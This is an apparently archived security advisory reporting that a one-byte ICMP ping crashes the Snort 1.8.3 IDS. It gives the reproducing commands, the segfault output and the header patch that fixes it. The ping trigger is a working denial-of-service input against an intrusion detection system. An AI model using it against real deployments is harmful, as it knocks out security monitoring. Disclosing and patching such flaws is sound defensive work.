|
COMMAND Snort IDS is succeptible to DoS (maybe exploitable remote buffer overflow) SYSTEMS AFFECTED Snort 1.8.3 and probably earlier PROBLEM Per \"Sinbad\" report, snort ICMP parser is doomed ... Example : # snort -dev host 192.168.0.3 and 192.168.0.1 Ping 192.168.0.1 from 192.168.0.3 within one data in payload: # ping -c 1 -s 1 192.168.0.1 Snort\'s output showed below: -*> Snort! <*- Version 1.8.3 (Build 88) By Martin Roesch (roesch@sourcefire.com, www.snort.org) 01/10-11:34:43.898282 0:80:AD:78:83:BB -> 0:E0:18:C4:52:76 type:0x800 len:0x2B 192.168.0.3 -> 192.168.0.1 ICMP TTL:64 TOS:0x0 ID:0 IpLen:20 DgmLen:29 DF Type:8 Code:0 ID:9435 Seq:0 ECHO Segmentation fault (core dumped) SOLUTION Following patch has been committed to the Snort 1.8 branch of Snort CVS and is included in build 90. --- olddecode.h Thu Jan 10 15:47:48 2002 +++ decode.h Thu Jan 10 12:15:33 2002 @@ -105,7 +105,7 @@ #define IP_HEADER_LEN 20 #define TCP_HEADER_LEN 20 #define UDP_HEADER_LEN 8 -#define ICMP_HEADER_LEN 8 +#define ICMP_HEADER_LEN 4 #define TH_FIN 0x01 #define TH_SYN 0x02